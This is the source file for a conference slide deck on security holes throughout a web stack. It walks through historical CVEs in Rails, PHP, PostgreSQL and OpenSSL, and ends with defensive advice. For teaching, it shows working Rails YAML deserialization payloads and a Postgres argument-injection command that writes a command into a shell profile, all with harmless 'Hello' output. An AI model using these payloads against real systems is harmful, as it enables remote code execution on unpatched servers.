doctype html
html
  head
    meta(charset='utf-8')
    meta(name='viewport', content='width=device-width, initial-scale=1, maximum-scale=1')
    title Your Web Stack Would Betray You In An Instant

    // build:css styles/styles.css
    //- Check out 'src/bower_components/prism/themes/' for available themes
    link(rel='stylesheet', type='text/css', href='bower_components/prism/themes/prism-tomorrow.css')
    link(rel='stylesheet', type='text/css', href='styles/defaults.css')
    link(rel='stylesheet', type='text/css', href='styles/main.css')
    // endbuild

  body

    article

      section
        h1.title Your Web Stack Would Betray You In An Instant
        address.vcard
          div.author.fn Tim Perry
          div.note.bio
            span Tech Lead &amp; Open-Source Champion at 
            span.org.vcard
              a.org.fn.url(href='http://softwire.com',rel="group") Softwire
          ul.urls
            li
              a.url(href='http://tim-perry.co.uk',rel="me") tim-perry.co.uk
            li
              a.nickname.url(href='http://twitter.com/pimterry',rel="me") @pimterry
            li
              a.url(href='http://github.com/pimterry',rel="me") github.com/pimterry
        aside
          ul
            li Tim Perry
            li Softwire. London. Bespoke dev on a huge variety of projects
            li Softwire are hiring!

      section
        h2 Security

      section
        h2 Your Application

        ul.stack
          li Your Code
          li Web Framework
          li Programming Language
          li Web Server
          li Database
          li Network Transport

      section
        h2 Easily Vulnerable Things

        ul.stack
          li.lowlight Your Code
          li Web Framework
          li Programming Language
          li Web Server
          li Database
          li Network Transport

      section
        h2.full-slide Ruby on Rails

        ul.stack.corner
          li.lowlight Your Code
          li Web Framework
          li.lowlight Programming Language
          li.lowlight Web Server
          li.lowlight Database
          li.lowlight Network Transport

      section
        h2 YAML

        pre
          code.language-yaml.
            ---
            name: "Tim Perry"
            company: "Softwire"
            speaking: Yes
            ears:
             - "Left"
             - "Right"
      section
        h2 YAML

        pre
          code.language-yaml.
            --- !ruby/hash:User
            name: "Tim Perry"
            company: "Softwire"
            speaking: Yes
            arms:
             - "Left"
             - "Right"
      section
        h2 YAML
        pre
          code.language-ruby.
            user = User.allocate
            values.each_pair { |key,val|
                user[key] = val
            }
      section
        h2 NamedRouteCollection
        pre
          code.language-ruby.
            alias []= add

            def add(name, route)
              ...
              @module.module_eval(
                "remove_possible_method :\#{name}; ..."
              )
              ...
            end
      section
        h2 Arbitrary Code Execution with YAML
        pre
          code.language-yaml.
            --- !ruby/hash:NamedRouteCollection
            "ignored; puts 'Hello'; \n__END__\n": 
                !ruby/object:OpenStruct 
                  ‘table’: {‘defaults’: {}}
        p (Namespaces omitted)
      section
        h2 Rails
        h4 CVE-2013-0156
        pre
          code.language-yaml.
            &lt;?xml version="1.0"?&gt;
            &lt;foo type='yaml'&gt;
              --- !ruby/hash:NamedRouteCollection
              "ignored; puts 'Hello'; \n__END__\n":
                  !ruby/object:OpenStruct
                    'table': {'defaults': {}}
            &lt;/foo&gt;
      section
        h2 Rails
        h4 CVE-2013-0333
        pre
          code.language-yaml.
            Content-Type: application/json

            --- !ruby/hash\u003aNamedRouteCollection
            "ignored; puts 'Hello'; \n__END__\n":
                !ruby/object\u003aOpenStruct
                  'table': {'defaults': {}}
      section
        h2 Rails
        h4 CVE-2013-0277
        pre
          code.language-ruby.
            class BlogPost &lt; ActiveRecord::Base
              :serialize tags
            end
    
      section
        h2.full-slide Ouch
      
      section
        h2.full-slide Distrust Complexity

      section
        h2.full-slide Fear user input
        h3 (in any format)

      section
        h2.full-slide PHP 

        ul.stack.corner
          li.lowlight Your Code
          li.lowlight Web Framework
          li Programming Language
          li.lowlight Web Server
          li.lowlight Database
          li.lowlight Network Transport

      section
        h2 PHP
        pre
          code.language-php.
            $user = new User();
            $user-&gt;username = $_POST['username'];

            $hashedPassword = crypt($_POST['password'], $salt);
            $user-&gt;password = $hashedPassword;

            $user-&gt;save();
        p (Salt generation and all validation omitted)

      section
        h2 PHP
        pre
          code.language-php.
            $salt = $user-&gt;password;
            $hashedPasswordInput = crypt($_POST['password'], $salt);

            $loginOk = ($user-&gt;password === $hashedPasswordInput);
      section
        h2 PHP 5.3.7
        h4 CVE-2011-3189
        pre(style='font-size: 24px')
          code.language-c.

          span(style='color: #f77')
            code.language-c.
            | - strncat(passwd, "$", 1);

          br
          span(style='color: #7f7')
            code.language-c.
            | + strlcat(passwd, "$", 1);
        aside
          ul
            li Fixed another important security issue
            li Recommended for immediate update for 5 days
            li N vs L
            li N appends string of given length, and null-terminates
            li L takes a total length, and ensures it's null terminated
            li Means that the second one always just sets passwd to be an empty string
            li Linting fix, for security reasons

      section
        h2 PHP 5.3.7
        h4 CVE-2011-3189
        pre
          code.language-php.
            crypt($password, $salt) === $salt
      section
        h2 PHP 5.3.7
        h4 CVE-2011-3189
        pre
          code.language-php.
            $salt = $user-&gt;password;
            $hashedPasswordInput = crypt($_POST['password'], $salt);

            $loginOk = ($user-&gt;password === $hashedPasswordInput);
      section
        h2 PHP 5.3.7
        h4 CVE-2011-3189
        pre
          code.language-php.
            $salt = $user-&gt;password;
            $hashedPasswordInput = $salt;

            $loginOk = ($user-&gt;password === $hashedPasswordInput);
      section
        h2 Tests?
      section
        h2 Reported?

      section
        h2.full-slide Best Practices Matter

      section
        h2.full-slide PostgreSQL
        ul.stack.corner
          li.lowlight Your Code
          li.lowlight Web Framework
          li.lowlight Programming Language
          li.lowlight Web Server
          li Database
          li.lowlight Network Transport
      
      section
        h2 Postgres
        pre
          code.language-bash.
            psql --host="example.com" \
                 --dbname="blogdb"
      section
        h2 Postgres
        h4 CVE-2013-1899
        pre
          code.language-bash.
            psql --host="example.com" \
                 --dbname="-r /var/lib/postgres/data/db"
      section
        h2 Postgres
        h4 CVE-2013-1899
        pre
          code.language-bash.
            no pg_hba.conf entry for host "example.com", 
              user "postgres", database "-r my_provided_filename"
      section
        h2 Postgres
        h4 CVE-2013-1899
        pre
          code.language-bash.
            psql --host="example.com" \
                 --dbname="-r /var/lib/postgres/.profile" \
                 --username="
                 echo 'Hello' #"
      section
        h2 Postgres
        h4 CVE-2013-1899
        pre
          code.language-bash.
            $ cat .profile
            [...]
            no pg_hba.conf entry for host "example.com", user "
            echo 'Hello' #", database "-r /var/lib/postgres/.profile"

        pre
          code.language-bash.
            $ su - postgres
            no: command not found
            Hello
      section
        h2.full-slide Isolate Your Infrastructure
        p (And everything else)
        aside
          ul
            li No auth required
            li Filtering in Postgres wouldn't've worked
            li Only safe with a hard firewall in the way
            li Don't rely on one single point of failure for security
            li Huge problems for Heroku etc
      section
        h2 OpenSSL
        h4 Heartbleed (CVE-2014-0160)

        img(src='/images/heartbleed.svg',height=350)
        
        ul.stack.corner
          li.lowlight Your Code
          li.lowlight Web Framework
          li.lowlight Programming Language
          li.lowlight Web Server
          li.lowlight Database
          li Network Transport

      section
        h2 OpenSSL
        h4 Heartbleed (CVE-2014-0160)
        pre
          code.language-c.
            // Read payload length into 'payload' var
            n2s(requestBuffer, payload);

            // Allocate memory for the response
            responseBuffer = OPENSSL_malloc(1 + 2 + payload + padding);

            // Write payload length to response buffer
            s2n(payload, responseBuffer);

            // Copy 'payload' bytes from request buffer to response
            memcpy(responseBuffer, requestBuffer, payload);
        p (Some variable names changed for clarity)
        aside
          ul
            li Payload var naming
            li Memcpy
            li OPENSSL_malloc

      section
        h2 Tarsnap
        h4 Heartbleed (CVE-2014-0160)
        aside
          ul
            li Using SSL
            li Actually an old version so safe anyway
            li Would've been fairly safe regardless
            li Secret data is not directly accessible from traffic
            li SSL terminated separately from server, and then forwarded

      section
        h4 Nothing is really secure, but
        h2.full-slide Don't Panic
        ul.conclusions
          li Distrust complexity
          li Be very cautious around user input (in any format)
          li Pay attention to good software development practices
          li Isolate your components from one another 
          li Isolate your components from the world
          li <strong>Watch for security notices, and be ready to update <em>fast</em></strong>

      section
        h2 Any questions?
        h4 The also rans:
        ul
          li <strong>Node.JS</strong>: Cross-request header stealing <br/>(CVE-2012-2330)
          li <strong>Python</strong>: Remote code execution via builtin socket receive function <br/>(CVE-2014-1912)
          li <strong>GCC</strong>: Optimization removes check required to avoid overflow <br/>(CVE-2009-1897)
          li <strong>WebSockets</strong>: Security bug in initial spec, when used with caching proxies
          li <strong>BEAST/CRIME/BREACH</strong>: Series of attacks against SSL/TLS <br/>(CVE-2011-3389, CVE-2012-4929, CVE-2013-3587)
          li <strong>MongoDB</strong>: Overflow exploits, crashing servers with a single request <br/>(CVE-2012-6619, CVE-2013-2132) 
          li <strong>RubyGems</strong>: YAML exploit gave an external user full access to the repo
          li <strong>NPM</strong>: Full disk exposure on NPM server with a maliciously crafted URL       

        

    // build:js scripts/scripts.js
    script(src='bower_components/bespoke.js/dist/bespoke.min.js')
    script(src='bower_components/bespoke-keys/dist/bespoke-keys.min.js')
    script(src='bower_components/bespoke-touch/dist/bespoke-touch.min.js')
    script(src='bower_components/bespoke-scale/dist/bespoke-scale.min.js')
    script(src='bower_components/bespoke-hash/dist/bespoke-hash.min.js')
    script(src='bower_components/bespoke-state/dist/bespoke-state.min.js')
    script(src='bower_components/prism/prism.js')
    script(src='bower_components/prism/components/prism-ruby.js')
    script(src='bower_components/prism/components/prism-php.js')
    script(src='bower_components/prism/components/prism-c.js')
    script(src='bower_components/prism/components/prism-bash.js')
    script(src='scripts/prism-yaml.js')
    script(src='scripts/main.js')
    // endbuild
